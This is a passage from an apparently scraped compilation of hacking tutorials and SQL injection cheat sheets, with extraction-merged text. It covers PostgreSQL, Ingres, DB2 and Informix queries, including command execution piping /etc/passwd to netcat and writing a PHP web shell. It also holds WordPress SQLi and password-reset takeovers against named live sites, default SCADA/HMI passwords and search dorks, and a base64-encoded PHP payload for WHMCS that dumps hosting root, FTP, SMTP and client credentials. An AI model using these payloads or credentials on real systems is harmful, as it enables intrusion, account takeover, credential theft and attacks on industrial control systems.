FROMpg_classC,pg_namespace N, pg_attribute A,pg_type T WHERE (C.relkind=’r') AND(N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND(A.atttypid=T.oid) AND(A.attnum>0) AND(NOT A.attisdropped) AND(N.nspname ILIKE‘public’) ANDattname LIKE‘%password%’; SelectNthRow SELECT usename FROMpg_userORDER BY usename LIMIT 1 OFFSET0; — rows numberedfrom0 SELECT usename FROMpg_userORDER BY usename LIMIT 1 OFFSET1; SelectNthChar SELECT substr(‘abcd’,3,1); — returnsc Bitwise AND SELECT 6 & 2; — returns2 SELECT 6 & 1; –returns 0 ASCIIValue -> Char SELECT chr(65);
  • 201.
    Char -> ASCII Value SELECTascii(‘A’); Casting SELECT CAST(1as varchar); SELECT CAST(’1′as int); String Concatenation SELECT ‘A’||‘B’; — returnsAB If Statement IF statementsonlyseemvalidinsidefunctions,soaren’tmuchuse forSQL injection. See CASEstatementinstead. Case Statement SELECT CASEWHEN (1=1) THEN ‘A’ELSE ‘B’END; — returnsA AvoidingQuotes SELECT CHR(65)||CHR(66); — returnsAB Time Delay SELECT pg_sleep(10);— postgres8.2+ only CREATE OR REPLACE FUNCTION sleep(int) RETURNSintAS‘/lib/libc.so.6′,‘sleep’ language ‘C’STRICT; SELECT sleep(10); –priv,create yourownsleepfunction. Taken fromhere . Make DNS Requests Generallynotpossible inpostgres. Howeverif contrib/dblinkisinstalled(itisn’tby default) itcanbe usedto resolve hostnames(assumingyouhave DBA rights): SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT); Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”. Command Execution CREATE OR REPLACE FUNCTION system(cstring) RETURNSintAS‘/lib/libc.so.6′, ‘system’LANGUAGE‘C’STRICT; — privSELECTsystem(‘cat/etc/passwd|nc10.0.0.1 8080′); — priv,commandsrun as postgres/pgsqlOS-level user Local File Access CREATE TABLE mydata(ttext); COPY mydataFROM‘/etc/passwd’; — priv,canreadfileswhichare readable by postgresOS-level user …’ UNION ALL SELECT t FROMmydata LIMIT 1 OFFSET 1; — getdata back one row at a time …’ UNION ALL SELECT t FROMmydata LIMIT 1 OFFSET 2; — getdata back one row at a time … DROP TABLE mytestmytest;Write toafile: CREATE TABLE mytable (mycol text);
  • 202.
    INSERT INTO mytable(mycol)VALUES (‘<? pasthru($_GET[cmd]); ?>’); COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS- level user. Generally you won’t be able to write to the web root, but it’s always work a try. – priv user can also read/write files by mapping libc functions Hostname,IP Address SELECT inet_server_addr(); — returnsdbserverIPaddress(ornull if usinglocal connection) SELECT inet_server_port(); — returnsdbserverIPaddress(ornull if usinglocal connection) Create Users CREATE USER test1PASSWORD‘pass1′; — priv CREATE USER test1PASSWORD‘pass1′ CREATEUSER; — priv,grant some privsatthe same time Drop Users DROP USER test1; — priv Make User DBA ALTER USER test1CREATEUSER CREATEDB; — priv Location of DB files SELECT current_setting(‘data_directory’); — priv SELECT current_setting(‘hba_file’); — priv Default/System Databases template0 template1
  • 203.
    Ingres SQL InjectionCheatSheet Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier. Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here. This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more. This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Version selectdbmsinfo(‘_version’); Comments SELECT 123; — comment select123; /* comment*/ CurrentUser selectdbmsinfo(‘session_user’); selectdbmsinfo(‘system_user’); List Users Firstconnectto iidbdb,then: SELECT name,passwordFROMiiuser;— or SELECT ownFROMiidatabase; Create Users create usertestuserwith password=‘testuser’;–priv
  • 204.
    List PasswordHashes Firstconnectto iidbdb,then: selectname,passwordfromiiuser; ListPrivileges selectdbmsinfo(‘db_admin’); selectdbmsinfo(‘create_table’); selectdbmsinfo(‘create_procedure’); selectdbmsinfo(‘security_priv’); selectdbmsinfo(‘select_syscat’); selectdbmsinfo(‘db_privileges’); selectdbmsinfo(‘current_priv_mask’); List DBA Accounts TODO CurrentDatabase selectdbmsinfo(‘database’); List Databases SELECT name FROMiidatabase; — connecttoiidbdb List Columns selectcolumn_name,column_datatype,table_name,table_ownerfrom iicolumns; List Tables selecttable_name,table_ownerfromiitables; selectrelid,relowner,rellocfromiirelation; selectrelid,relowner,rellocfromiirelationwhere relowner!=‘$ingres’; FindTablesFrom ColumnName SELECT table_name,table_ownerFROMiicolumnsWHEREcolumn_name = ‘value’ SelectNthRow Astoundingly,this doesn’tseemtobe possible! Thisisasclose as you can get:selecttop10 blahfrom table; selectfirst10 blahform table; SelectNthChar selectsubstr(‘abc’,2,1); — returns‘b’ Bitwise AND The function“bit_and”exists,butseemshardtouse. Here’san example of ANDing3and5 together. The resultisa “byte”type withvalue ?01:selectsubstr(bit_and(cast(3asbyte),cast(5as byte)),1,1); ASCIIValue ->Char TODO Char -> ASCIIValue TODO (The “ascii”functionexists,butdoesn’tseemtodowhatI’dexpect.)
  • 205.
    Casting selectcast(123 as varchar); selectcast(’123′as integer); StringConcatenation select‘abc’|| ‘def’; If Statement TODO Case Statement TODO AvoidingQuotes TODO Time Delay ???See HeavyQueries articleforsome ideas. Make DNSRequests TODO CommandExecution Impossible? Local File Access TODO Hostname,IPAddress SELECT dbmsinfo(‘ima_server’) Locationof DB files SELECT dbdev,ckpdev,jnldev,sortdevFROMiidatabase WHEREname = ‘value’ — primarylocationof db SELECT lname FROMiiextendWHEREdname = ‘value’ — extendedlocationof db SELECT are FROM iilocationswhere lname=‘value’ –all area (ie directory) linked witha location Default/System Databases SELECT name FROMiidatabase WHEREown= ‘$ingres’ — connectto iidbdb InstallingLocally The Ingresdatabase can be downloadedforfree from http://esd.ingres.com/ A pre-builtLinux-basedIngresDatabase Servercanbe downloadfrom http://www.vmware.com/appliances/directory/832 Database Client TODO There isa clientcalled“sql”whichcanbe usedforlocal connections(atleast) in the database serverpackage above. Logginginfrom commandline $ su - ingres $ sql iidbdb * selectdbmsinfo(‘_version’);go
  • 206.
    Identifyingonthe network TODO The following areasare interesting enough to include on this page, but I haven’t researched them for other databases: Description SQL / Comments BatchingQueriesAllowed? Notvia DBI inPERL. Subsequentstatementsseemtogetignored: selectblahfromtable where foo=1; select… doesn’tmatterthis is ignored. FROM clause mandatedin SELECTs? No. Youdon’t needtoselectform“dual”or anything. The following islegal: select1; UNION supported Yes. Nothingtrickyhere. The followingislegal: select1 unionselect2; Enumerate TablesPrivs selecttable_name,permit_user,permit_typefromiiaccess; Lengthof a string selectlength(‘abc’); — returns3 Rolesand passwords Firstyou needtoconnectto iidbdb,then: selectroleid,rolepassfromiirole; List Database Procedures Firstyou needtoconnectto iidbdb,then: selectdbp_name, dbp_ownerfromiiprocedure; Create Users+ GrantingPrivs Firstyou needtoconnectto iidbdb,then: create userpm withpassword= ‘password’; grant all on currentinstallationtopm;
  • 207.
    DB2 SQL InjectionCheatSheet Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared… Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on DB2 8.2 under Windows. This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version selectversionnumber,version_timestampfromsysibm.sysversions; Comments selectblahfromfoo; — commentlike this CurrentUser selectuserfromsysibm.sysdummy1; selectsession_userfromsysibm.sysdummy1; selectsystem_userfromsysibm.sysdummy1; List Users N/A (IthinkDB2 usesOS-level useraccountsforauthentication.)Database authorities(like roles,Ithink) can be listedlikethis: selectgrantee fromsyscat.dbauth; List PasswordHashes N/A (IthinkDB2 usesOS-level useraccountsforauthentication.) List Privileges select* fromsyscat.tabauth; — privson tables
  • 208.
    select* fromsyscat.dbauthwhere grantee=currentuser; select* fromsyscat.tabauthwhere grantee =currentuser; select* fromSYSIBM.SYSUSERAUTH – Listdb2 systemprivilegies List DBA Accounts selectname fromSYSIBM.SYSUSERAUTH where SYSADMAUTH= ‘Y’or SYSADMAUTH = ‘G’ CurrentDatabase selectcurrentserverfromsysibm.sysdummy1; List Databases SELECT schemaname FROMsyscat.schemata; List Columns selectname,tbname,coltypefromsysibm.syscolumns; List Tables selectname fromsysibm.systables; FindTablesFrom ColumnName selecttbname fromsysibm.syscolumnswhere name=’username’ SelectNthRow selectname from(SELECT name FROMsysibm.systablesorderby name fetchfirstN+M-1 rowsonly) sqorderby name descfetchfirstN rows only; SelectNthChar SELECT SUBSTR(‘abc’,2,1) FROMsysibm.sysdummy1; — returnsb Bitwise AND Thispage seemstoindicate thatDB2 has no supportforbitwise operators! ASCIIValue ->Char selectchr(65) from sysibm.sysdummy1; — returns‘A’ Char -> ASCIIValue selectascii(‘A’) fromsysibm.sysdummy1; — returns65 Casting SELECT cast(’123′ as integer) FROMsysibm.sysdummy1; SELECT cast(1 as char) FROMsysibm.sysdummy1; StringConcatenation SELECT ‘a’concat ‘b’ concat ‘c’ FROMsysibm.sysdummy1; — returns‘abc’ select‘a’|| ‘b’fromsysibm.sysdummy1; — returns‘ab’
  • 209.
    Informix SQL InjectionCheatSheet Some useful syntax reminders for SQL Injection into Informix databases… Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here. This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Version SELECT DBINFO(‘version’,‘full’) FROMsystablesWHEREtabid= 1; SELECT DBINFO(‘version’,‘server-type’) FROMsystablesWHEREtabid= 1; SELECT DBINFO(‘version’,‘major’),DBINFO(‘version’,‘minor’),DBINFO(‘version’, ‘level’) FROMsystablesWHEREtabid= 1; SELECT DBINFO(‘version’,‘os’) FROMsystablesWHEREtabid= 1; — T=Windows, U=32 bitapp on 32-bitUnix,H=32-bit app runningon64-bit Unix,F=64-bit app runningon64-bit unix Comments select1 FROMsystablesWHEREtabid = 1; — comment CurrentUser SELECT USER FROMsystablesWHERE tabid= 1; selectCURRENT_ROLE FROMsystablesWHEREtabid= 1; List Users selectusername,usertype,passwordfromsysusers; List PasswordHashes TODO
  • 210.
    List Privileges selecttabname,grantor,grantee,tabauthFROMsystabauthjoinsystableson systables.tabid=systabauth.tabid; —whichtablesare accessiblebywhichusers selectprocname,owner,grantor,grantee fromsysprocauthjoinsysprocedures on sysprocauth.procid=sysprocedures.procid; — whichproceduresare accessible bywhichusers List DBA Accounts TODO CurrentDatabase SELECT DBSERVERNAMEFROMsystableswhere tabid=1; — servername List Databases selectname,ownerfromsysdatabases; List Columns selecttabname,colname,owner,coltype FROMsyscolumnsjoinsystableson syscolumns.tabid=systables.tabid; List Tables selecttabname,ownerFROMsystables; selecttabname,viewtextFROMsysviews joinsystablesonsystables.tabid= sysviews.tabid; List Stored Procedures selectprocname,ownerFROMsysprocedures; FindTablesFrom ColumnName selecttabname,colname,owner,coltype FROMsyscolumnsjoinsystableson syscolumns.tabid=systables.tabidwhere colnamelike‘%pass%’; SelectNthRow selectfirst1 tabidfrom(selectfirst10 tabidfrom systablesorderbytabid) assq orderby tabiddesc; — selectsthe 10th row SelectNthChar SELECT SUBSTRING(‘ABCD’FROM3 FOR 1) FROM systableswheretabid=1; — returns‘C’ Bitwise AND selectbitand(6,1) fromsystableswhere tabid=1; — returns0 selectbitand(6,2) fromsystableswhere tabid=1; — returns2 ASCIIValue ->Char TODO Char -> ASCIIValue selectascii(‘A’) fromsystableswhere tabid=1; Casting selectcast(’123′ as integer) fromsystableswhere tabid=1; selectcast(1as char) from systableswheretabid=1;
  • 211.
    StringConcatenation SELECT ‘A’||‘B’ FROMsystableswheretabid=1; — returns‘AB’ SELECT concat(‘A’,‘B’) FROMsystableswhere tabid=1; — returns‘AB’ StringLength SELECT tabname,length(tabname), char_length(tabname), octet_length(tabname) fromsystables; If Statement TODO Case Statement selecttabid,case whentabid>10then“High” else ‘Low’endfromsystables; AvoidingQuotes TODO Time Delay TODO Make DNSRequests TODO CommandExecution TODO Local File Access TODO Hostname,IP Address SELECT DBINFO(‘dbhostname’) FROMsystablesWHEREtabid= 1; — hostname Locationof DB files TODO Default/System Databases These are the systemdatabases: sysmaster sysadmin* sysuser* sysutils* * = don’t seem to contain anything / don’t allow readingInstalling Locally You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows. Database ClientThere’s a database client SDK available, but I couldn’t get the demo client working. I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).Logging in from command line If you get local admin rights on a Windows box and have a GUI logon:
  • 212.
     Click:Start |All Programs| IBMInformix DynamicServer11.50 | someservername. Thiswill give youa commandprompt withvariousEnvironmentvariablessetproperly.  Run dbaccess.exefromyourcommandprompt. Thiswill bringupa text-basedGUIthatallows youto browse databases. The following were set on my test system. This may help if you get command line access, but can’t get a GUI – you’ll need to change “testservername”: set INFORMIXDIR=C:PROGRA~1IBMIBMINF~111.50 set INFORMIXSERVER=testservername set ONCONFIG=ONCONFIG.testservername set PATH=C:PROGRA~1IBMIBMINF~111.50bin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSyste m32Wbem;C:PROGRA~1ibmgsk7bin;C:PROGRA~1ibmgsk7lib;C:Program FilesIBMInformixClien-SDKbin;C:Program Filesibmgsk7bin;C:Program Filesibmgsk7lib set CLASSPATH=C:PROGRA~1IBMIBMINF~111.50extendkrakatoakrakatoa.jar;C:PROGRA~1IBMI BMINF~111.50xtendkrakatoajdbc.jar; set DBTEMP=C:PROGRA~1IBMIBMINF~111.50infxtmp set CLIENT_LOCALE=EN_US.CP1252 set DB_LOCALE=EN_US.8859-1 set SERVER_LOCALE=EN_US.CP1252 set DBLANG=EN_US.CP1252 mode con codepage select=1252 Identifying on the network My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix: $ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all … 1526/tcp open pdap-np? 9088/tcp open unknown 9089/tcp open unknown … TODO How would we identify Informix listening on the network?
  • 213.
    WordPress Hacking Tricks I.Hacking WordPress .. (Without Cracking the hashes) you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012 Things u need 1) any wordpress sqli dork .. (u can get it from exploit-db.com) 2) knowledge of sqli .. (coz this thread is not about sqli) Lets Start , 1) My Dork There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect.. and the google dork for it is .. Code : inurl:"/?fbconnect_action=myhome" now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites .. 2) now the website im going to use here is .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2 > here the parameter userid is vulnerable to sqli .. > so lets see what we can get from the data base .. > im going to change the above URL with this Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3, 4,5,concat(user_login,0x3a,user_email)?,7,8,9,10,11,12+from+wp_users-- > now u can see we got the username with the email id .. > now if i change the above URL to this ..
  • 214.
    Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3, 4,5,concat(user_login,0x3a,user_pass),?7,8,9,10,11,12+from+wp_users-- > imgoing to get the user name and the hashed password .. > (point to be noted here .. im using concat here .. u can also use group_concat to get all the users.. > again .. that would be ur knowledge how u use sqli) > now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5) > and are very hard to crack .. > but if ur mad .. u should think out of the box .. > so now follow the steps .. a) go to the login page of of wordpress site .. in my case that would be .. Code : http://masaru.ikeda.me/wp-login.php b) click on Lost your password ? c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username .. d) now look closely .. it says .. "Check your e-mail for the confirmation link." e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key .. f) so now im going to change my URL to this .. to get the activation key .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3, 4,5,concat(user_login,0x3a,user_activa?tion_key),7,8,9,10,11,12+from+wp_users-- NOTE: we got the activation key here .. u should note it down somewhere .. g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL .. Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
  • 215.
    and im goingto replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be .. Code : http://masaru.ikeda.me/wp- login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru and VOILA .. the wordpress will ask u for ur new password .. now go the login page again .. and try the new password .. and there u go .. u got access to the panel .. now u know how to shell the wordpress site .. don't u ?? Trick for those .. who are actually MAD: 1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. > goto the login page and see .. if there is an option there to go back to the main page of the blog.. > like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... > if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me .. 2) once u have shelld the website .. > get the database details .. > use any database connector .. > go to the table .. wp_user .. and in the column wp_pass .. > replace the hash with the one u got in the very beginning .. > the actual hash of the admin .. now the password will be again what it was before .. > as nothing happened .. admin will never know what hit 'em .. Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..
  • 216.
    How To HackWordPress Websites using SQL Injection: HackingTutorial 5 comments Tutorial:How To Hack WordPress Websites using SQL injection What is Wordpress?? WordPressisa free and opensource bloggingtool anda contentmanagementsyste (CMS) basedon PHP andMySQL. It has many featuresincludingaplug-inarchitecture andatemplate system.WordPress iscurrentlythe mostpopularbloggingsysteminuse onthe Web.It wasfirstreleasedonMay 27, 2003, by foundersMattMullenweg. Nowletsmove onto a hackingwebsite.Ihave usedhere all-video-gallery(WordPressplugin)Sqli Vulnerability.. 1>Firstwe will find a Targetusinga Googledork inurl:all-video-gallery/config.php?vid= click on image for better preview....... 2>Open any website....Inmycase its juangrial.com.
  • 217.
    3>now letsdoa sqlinjection....copythe exploitcode thenhitenterthensee the Magic...:) ExploitCode forfindingusename &password:http://site.com/wp-content/plugins/all-video- gallery/config.php?vid=1&pid=11&pid=- 1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+wp_users--
  • 218.
    You can alsotry this.......well Bothwill workthe same......... ExploitCode forfindingusename &email:http://site.com/wp-content/plugins/all-video- gallery/config.php?vid=1&pid=11&pid=- 1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+wp_users- - 4>We Got adminEmail......NowLet!sresetit..... For that GO to:- http://site.com/wp-admin ORhttps://site.com/wp-login.php "Thenclick onLost Password"
  • 219.
    5>Enter the Emailwe Got IN earliersteps... 6>Now come back and go to activationtable.... * ExploitCode foractivationKey:http://site.com/wp-content/plugins/all-video- gallery/config.php?vid=1&pid=11&pid=- 1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,
  • 220.
  • 221.
  • 222.
    DNS Zone TransferVulnerability Exploit  Scan website with Acunetix Web Vulnerability Scanner.  If you get DNS zone transfer vulnerability
  • 223.
     Open commandprompt (run>cmd)  do nslookup.  type > ns lookup  type > server <website name>
  • 224.
     C:> settype-any  C:> ls -d <website name>
  • 225.
    Hacking SCADA Systems Withthe discovery of stuxnet and all the subsequent interest in industrial control systems it's worthwhile to learn a bit on how to exploit these for our own purposes. For now it's a copypaste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research. Contents :-  Terminology  Default Passwords  Google Dorks  Vulnerabilities and Other Resources Terminology: PLC: Programmable Logic Controller RTU: Remote Terminal Unit HMI: Human-Machine Interface Default Passwords : These should always be your first try if you come across an HMI listed. Due to the fact that the amount of attention these systems have received has only been true recently many of these HMIs still have their defaults. These can be accessed using a web panel, telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems. Schneider Electrics : pcfactory:pcfactory loader:fwdownload ntpupdate:ntpupdate sysdiag:factorycast@schneider test:testingpw USER:USER USER:USERUSER webserver:webpages
  • 226.
    fdrusers:sresurdf nic2212:poiuypoiuy nimrohs2212:qwertyqwerty nip2212:fcsdfcsd ftpuser:ftpuser noe77111_v500:RcSyyebczS AUTCSE:RybQRceeSd AUT_CSE:cQdd9debez target:RcQbRbzRyc Siemens Simatic : Administrator:100 SiemensWinCC : WinCCConnect:2WSXcder WinCCAdmin:2WSXcder WAGO : admin:wago Google Dorks: These will be added to as I go along, but are just a couple you can try out to search for HMIs. inurl:/plc/webvisu.htm "Miniweb on" "Control Functions" -filetype:pdf Vulnerabilities and Other Resources Vulnerabilities in some SCADA server softwares Metasploit Modules for SCADA-related Vulnerabilities SIMATIC HMI panels - some default Simatic HMIs you can play around with
  • 227.
    WHMCS Hacking withSumbit Ticket exploit Hi Mates ! Today we are going to learn, how to Hack WHMCS or you can say its submit ticket exploit ,through which we will we will get the cpanel username and password of hosting panel and website hosted on that whmcs. lets start step 1 : Get a website which provide hosting and find out the option " submit ticket" step 2 : now open submit ticket option and click on sales department step 3 : now we have to fill the following info like "name , email address, urgency put any random info is these fields and main thing is subject filed"
  • 228.
    fill this codein subject field : {php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQ okcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQok dGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAj IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2h fYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw 0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQo kYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQ oNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW 9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9J HRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJG hvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJH RleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc 3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio qKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMj IyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokd GV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbG VyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9 xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0 gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2Wyd yZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGR lY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmF sdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2
  • 229.
    WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkc mVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxy XG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMj IyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjI yMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkk cXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uI HdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYW NrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGl uZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3Ig IHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciA gc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCR xdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJH ZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS 4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjI yMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI 7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbn QgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlz cWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICd yb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIH VzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhd G9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlz cWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21ha W4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlc m5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3 N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tY Wluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjI yMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy 